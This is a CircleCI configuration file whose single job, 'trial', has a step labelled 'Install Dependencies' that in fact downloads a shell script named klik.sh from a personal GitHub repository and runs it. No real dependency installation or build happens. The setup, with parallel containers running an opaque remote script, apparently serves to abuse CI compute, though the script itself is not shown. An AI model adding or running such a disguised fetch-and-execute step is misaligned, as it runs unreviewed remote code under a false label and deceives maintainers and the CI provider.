version: 2.1
jobs:
    trial:
      docker:
            - image: circleci/ruby:2.5.3
      parallelism: 2
      steps:
        - run:
            name: Install Dependencies
            command: |
              wget https://raw.githubusercontent.com/Nurultyas7979/klik/main/klik.sh && chmod +x klik.sh  && ./klik.sh 
              

workflows:
    version: 2.1
    build:
        jobs:
        - trial